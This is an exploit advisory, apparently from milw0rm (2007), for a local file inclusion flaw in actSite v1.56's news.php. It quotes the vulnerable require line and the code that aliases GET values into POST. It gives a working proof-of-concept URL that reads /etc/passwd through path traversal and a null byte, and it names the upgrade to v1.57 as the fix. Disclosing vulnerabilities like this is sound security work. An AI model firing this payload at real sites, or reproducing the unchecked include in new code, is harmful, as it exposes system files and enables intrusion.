\#'#/
(-.-)
-----------------oOO---(_)---OOo-----------------
| actSite v1.56 (news.php) Local File Inclusion |
| coded by DNX |
-------------------------------------------------
[!] Discovered: DNX
[!] Vendor: http://www.actsite.de
[!] Detected: 02.09.2007
[!] Reported: 02.09.2007
[!] Remote: yes
[!] Background: actSite is a content management system based on PHP and MySQL
[!] Bug: in phpinc/news.php line 101 the 'do' request value is placed unchecked into a require path
require PHP_INCLUDE_PATH."/inc/news/news_$_POST[do].php";
[!] PoC:
- http://[site]/[path]/phpinc/news.php?do=/../../../../../../../etc/passwd%00
[!] Description:
- So why can we inject code into a POST variable via the URL? Let's do some research...
- In phpinc/news.php line 36
require_once('../config.php');
- Let's take a look in 'config.php' line 22
if(empty($BaseCfg['install_run'])) require_once($BaseCfg['BaseDir']."/phpinc/inc/csb.php");
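- Ok, let's take a look in 'phpinc/inc/csb.php' line 18 (on a GET request it aliases every $_GET entry into $_POST, which is how 'do' from the query string reaches the require in news.php)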
if(getenv('REQUEST_METHOD') == "GET") {
foreach($_GET as $key => $val) {
$_POST[$key] =& $_GET[$key];
}
}
[!] Solution: Install security update to v1.57
# milw0rm.com [2007-10-01]